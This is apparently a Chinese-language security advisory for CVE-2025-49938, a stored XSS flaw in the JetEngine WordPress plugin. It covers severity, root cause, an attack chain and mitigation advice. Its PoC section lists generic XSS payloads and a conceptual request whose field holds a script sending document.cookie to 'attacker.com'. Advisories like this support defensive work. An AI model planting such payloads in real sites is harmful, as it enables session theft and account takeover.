CVE-2025-49938: JetEngine插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-49938

漏洞类型

存储型XSS

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Crocoblock JetEngine (WordPress插件)

漏洞概述

CVE-2025-49938是WordPress插件JetEngine中的一个存储型跨站脚本（Stored XSS）漏洞，CVSS评分6.5，属于中危漏洞。该漏洞由Patchstack安全团队的[email protected]发现并报告。JetEngine是Crocoblock公司开发的知名WordPress页面构建器插件，广泛用于创建自定义帖子类型、自定义字段和动态内容。

该漏洞的根本原因在于JetEngine插件在处理用户输入时未能正确对输入进行中立化（Neutralization），导致恶意脚本代码可以被存储在数据库中。当其他用户访问包含恶意代码的页面时，浏览器会执行这些脚本，从而实现跨站脚本攻击。存储型XSS相比反射型XSS更为危险，因为恶意代码被永久存储在服务器端，所有访问相关页面的用户都会受到攻击。

攻击者可以利用此漏洞窃取受害者的会话cookie、劫持用户账户、进行钓鱼攻击或传播恶意软件。由于JetEngine是一个广泛使用的插件，该漏洞可能影响大量使用该插件的WordPress网站。攻击者需要拥有一定的权限（低权限即可）才能利用此漏洞，这降低了攻击门槛，使得即使是普通用户也可能成为潜在的威胁源。

技术细节

该存储型XSS漏洞存在于JetEngine插件的输入处理和输出渲染环节。漏洞的具体技术细节如下：

1. **输入处理缺陷**：JetEngine在接收用户输入时，未能对特殊字符进行适当的HTML实体编码或过滤。当用户提交包含JavaScript代码的输入（如<script>标签、事件处理器属性等）时，这些恶意代码被直接存储到WordPress数据库中。

2. **输出渲染问题**：当页面渲染时，JetEngine未能正确对存储的数据进行输出编码（output encoding），导致存储的恶意脚本被浏览器解析为可执行代码。

3. **攻击向量**：攻击者可以通过JetEngine的以下功能点注入恶意XSS代码：
- 自定义字段输入
- 动态内容生成
- 列表/网格项配置
- 查询构建器

4. **利用条件**：
- 攻击者需要拥有WordPress站点的基本写权限（如作者或更高角色）
- 需要用户交互才能触发（访问包含恶意代码的页面）
- 攻击复杂度低（AC:L）

5. **影响范围**：存储的恶意脚本可以影响所有访问相关页面的用户，包括管理员，可能导致会话劫持、敏感信息泄露等严重后果。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的JetEngine插件版本，确认版本 <= 3.7.3

STEP 2

步骤2: 账户获取

攻击者通过社会工程、凭证填充或其他方式获得WordPress站点的低权限账户（如Author角色）

STEP 3

步骤3: 恶意代码注入

攻击者通过JetEngine的自定义字段、动态内容或其他输入点注入XSS恶意代码，代码被存储到数据库中

STEP 4

步骤4: 等待受害者访问

攻击者等待或诱导其他用户（管理员、编辑等）访问包含恶意代码的页面

STEP 5

步骤5: XSS执行

受害者的浏览器解析页面时执行存储的恶意JavaScript代码

STEP 6

步骤6: 会话劫持

恶意脚本窃取受害者的Cookie或会话令牌，发送给攻击者控制的服务器

STEP 7

步骤7: 账户接管

攻击者使用窃取的会话信息劫持受害者账户，可能进一步获取管理员权限

STEP 8

步骤8: 持久化控制

攻击者可能在网站中植入后门、修改内容或窃取更多敏感数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-49938 PoC - JetEngine Stored XSS
// Note: This is a conceptual PoC based on the vulnerability description
// Actual exploitation requires specific JetEngine functionality access

// Example 1: XSS payload in a JetEngine custom field
const xssPayload1 = '<script>alert(document.cookie)</script>';

// Example 2: Event handler based XSS
const xssPayload2 = '<img src=x onerror=alert(document.domain)>';

// Example 3: SVG-based XSS
const xssPayload3 = '<svg onload=alert(String.fromCharCode(88,83,83))>';

// Example 4: JavaScript protocol XSS
const xssPayload4 = '<a href="javascript:alert(document.cookie)">Click me</a>';

// Example 5: Data URI XSS
const xssPayload5 = '<object data="data:text/html,<script>alert(1)</script>">';

// PoC Attack Flow:
// 1. Attacker with low privileges (e.g., Author role) creates/edits content
// 2. Injects XSS payload through JetEngine custom field or dynamic content
// 3. Payload is stored in database without proper sanitization
// 4. When other users (including admins) view the page, XSS executes
// 5. Attacker can steal session cookies, perform actions as victim

// Example HTTP Request (conceptual)
const httpRequest = {
  method: 'POST',
  url: '/wp-json/wp/v2/posts/{id}',
  headers: {
    'Content-Type': 'application/json',
    'X-WP-Nonce': '{nonce}'
  },
  body: {
    'meta': {
      'jet_engine_field': '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'
    }
  }
};

console.log('CVE-2025-49938 JetEngine Stored XSS PoC');
console.log('Affected: JetEngine <= 3.7.3');
console.log('Payloads above demonstrate various XSS injection techniques');

影响范围

JetEngine <= 3.7.3

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1）限制JetEngine相关功能的用户权限，仅允许可信用户使用该插件；2）启用Web应用防火墙（WAF）规则来检测和阻止XSS攻击；3）临时禁用JetEngine的非必要功能；4）实施严格的输出编码策略，使用WordPress的esc_html()和esc_attr()函数对所有输出进行编码；5）定期检查数据库中是否存在可疑的脚本标签或事件处理器属性；6）考虑使用第三方安全服务进行实时监控和威胁检测。